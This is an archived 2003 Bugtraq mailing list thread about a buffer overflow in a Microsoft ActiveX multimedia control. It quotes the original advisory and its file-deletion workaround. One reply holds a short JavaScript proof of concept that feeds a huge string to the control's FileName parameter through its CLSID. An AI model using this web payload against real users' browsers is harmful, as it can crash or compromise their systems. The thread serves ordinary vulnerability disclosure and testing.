Bugtraq mailing list archives
RE: Microsoft MCWNDX.OCX ActiveX buffer overflow
From: "Oliver Lavery" <oliver.lavery () sympatico ca>
Date: Wed, 13 Aug 2003 15:09:48 -0400
Hi Drew, Long time no speak. Blink coming along? MCI32.ocx is marked safe for initialization, so an attack is still possible. Doesn't seem like the filename argument suffers from an overflow tho'. Perhaps you could try this on 2k and see if this really is just a red herring: <script> buf = "A"; // doubling (this is a HUGE buffer, and swamps IE for a while) for (i = 0; i < 24; i++) buf += buf; wnd=open("about:blank","",""); // wnd.moveTo(screen.Width,screen.Height); WndDoc=wnd.document; WndDoc.open(); WndDoc.clear(); WndDoc.write('<HTML><BODY>'); WndDoc.write('<OBJECT ID="MCIWnd"'); WndDoc.write(' WIDTH=400 HEIGHT=300'); WndDoc.write(' CLASSID="CLSID:C1A8AF25-1257-101B-8FB0-0020AF039CA3">'); WndDoc.write(' <PARAM name="FileName" VALUE="' + buf +'">'); WndDoc.write('</OBJECT>'); WndDoc.write('</BODY>'); WndDoc.write('</HTML>'); </script> Cheers, ~ol
-----Original Message----- From: Drew Copley [mailto:dcopley () eeye com] Sent: August 13, 2003 2:44 PM To: 'xenophi1e'; bugtraq () securityfocus com; trihuynh () zeeup com Subject: RE: Microsoft MCWNDX.OCX ActiveX buffer overflow I find no "MCWNDX.ocx" on my system nor on google. It may be a Windows locality issue. Microsoft Multimedia Control fits the description, though, as you noted. It does have a "FileName" method and uses the .mci filetype, but on Windows 2000 it is not a safe activex control for scripting on webpages in the Internet Zone.-----Original Message----- From: xenophi1e [mailto:oliver.lavery () sympatico ca] Sent: Wednesday, August 13, 2003 10:51 AM To: bugtraq () securityfocus com Subject: Re: Microsoft MCWNDX.OCX ActiveX buffer overflow In-Reply-To: <007201c361df$c311f0c0$329f8018@youru10ixi0anw> Does anyone know what the guid for this control is? I don't have it on XP with Visual Studio 6 installed. Could this be the same as the Microsoft Multimedia Control, aka MCI32.OCX? Cheers, ~olMicrosoft MCWNDX.OCX ActiveX buffer overflow=================================================PROGRAM: MICROSOFT MCIWNDX.OCX ACTIVEX BUFFER OVERFLOWHOMEPAGE: www.microsoft.comVULNERABLE VERSIONS: MCWNDX is an ActiveX shipped withVisual Studio 6tosupport multimedia programming.DESCRIPTION=================================================MCWNDX is an activeX shipped with Visual Studio 6 tosupport multimedia programming. Although not many people use it anymore,however it still can be called through CLSID in a websiteand passing alarge amount of data to the activex will cause an buffer overflow.Since this Activex is only shipped with VIsual Studio 6.0, so onlypeople who are having Visual Studio 6.0 will be affected or peoplewho are still using old multimedia programs coded in VisualStudio 6.0(In my PC, the last date the ActiveX is patched is in 1996 !I am usingVS Sp 4)DETAILS=================================================The ActiveX has a property called "Filename" which is usedto specifythe .mci file to load. However if it is passed with a very largestring(640KBis good enough :-) ), it will cause a bufferoverflow. (I can't overwritetheEIP using this overflow in my XP, however it doesn't meanthe problemcan'tbe exploited)Microsoft has been noticed but since the hole is maybe minorto them sothey don't response to me even a short sentence like "Thank you !"WORKAROUND=================================================Delete the file MCWNDX.ocx in your SYSTEM32 directory if you areusing 2000 or XP or in your SYSTEM directory if you areusing WIN ME orbelowCREDITS=================================================Discovered by Tri Huynh from Sentry UnionDISLAIMER=================================================The information within this paper may change withoutnotice. Use ofthis information constitutes acceptance for use in an AS IScondition.There are NO warranties with regard to this information.In no eventshall the author be liable for any damages whatsoeverarising out ofor in connection with the use or spread of thisinformation. Any useof this information is at the user's own risk.FEEDBACK=================================================Please send suggestions, updates, and comments to:trihuynh () zeeup com
Current thread:
- Microsoft MCWNDX.OCX ActiveX buffer overflow Tri Huynh (Aug 13)
- Message not available
- <Possible follow-ups>
- Re: Microsoft MCWNDX.OCX ActiveX buffer overflow xenophi1e (Aug 13)
- RE: Microsoft MCWNDX.OCX ActiveX buffer overflow Drew Copley (Aug 13)
- RE: Microsoft MCWNDX.OCX ActiveX buffer overflow Oliver Lavery (Aug 13)
- RE: Microsoft MCWNDX.OCX ActiveX buffer overflow Drew Copley (Aug 13)